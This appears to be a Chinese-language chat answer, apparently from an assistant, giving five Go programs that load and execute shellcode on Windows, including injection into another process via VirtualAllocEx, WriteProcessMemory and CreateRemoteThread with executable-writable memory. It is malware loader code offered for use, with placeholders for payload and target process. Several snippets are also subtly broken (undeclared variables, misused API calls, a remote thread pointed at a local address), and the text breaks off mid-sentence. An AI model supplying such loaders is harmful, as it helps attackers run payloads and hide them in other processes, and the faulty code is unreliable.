有其他不同加载shellcode类型的例子吗？举例五个。
以下是加载shellcode的五个不同类型的例子:
- 使用VirtualAlloc分配内存并使用RtlMoveMemory复制shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用VirtualAllocEx分配远程进程内存并使用WriteProcessMemory复制shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
processHandle, _ := syscall.OpenProcess(syscall.PROCESS_ALL_ACCESS, false, <pid>) // 替换<pid>为目标进程ID
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAllocEx").Addr(), 6, uintptr(processHandle), 0, uintptr(len(shellcode)), 0x3000, 0x40, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("WriteProcessMemory").Addr(), 4, uintptr(processHandle), allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateRemoteThread").Addr(), 5, uintptr(processHandle), 0, 0, allocatedMemory, 0, 0)
}
- 使用VirtualProtect分配内存并使用memcpy复制shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect").Addr(), 4, allocatedMemory, uintptr(len(shellcode)), 0x40, uintptr(unsafe.Pointer(&oldProtect)))
memcpy, _ := syscall.GetProcAddress(syscall.NewLazyDLL("msvcrt.dll").Handle, []byte("memcpy")) // 替换msvcrt.dll为适当的DLL
syscall.Syscall6(syscall.NewCallback(unsafe.Pointer(&memcpy)), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用CreateThread分配内存并使用memcpy复制shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0)
memcpy, _ := syscall.GetProcAddress(syscall.NewLazyDLL("msvcrt.dll").Handle, []byte("memcpy")) // 替换msvcrt.dll为适当的DLL
syscall.Syscall6(syscall.NewCallback(unsafe.Pointer(&memcpy)), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用VirtualAlloc分配内存并使用CreateRemoteThread从远程进程中执行shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
processHandle, _ := syscall.OpenProcess(syscall.PROCESS_ALL_ACCESS, false, <pid>) // 替换<pid>为目标进程ID
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateRemoteThread").Addr(), 5, uintptr(processHandle), 0, 0, allocatedMemory, 0, 0)
}
请注意,上述代码中的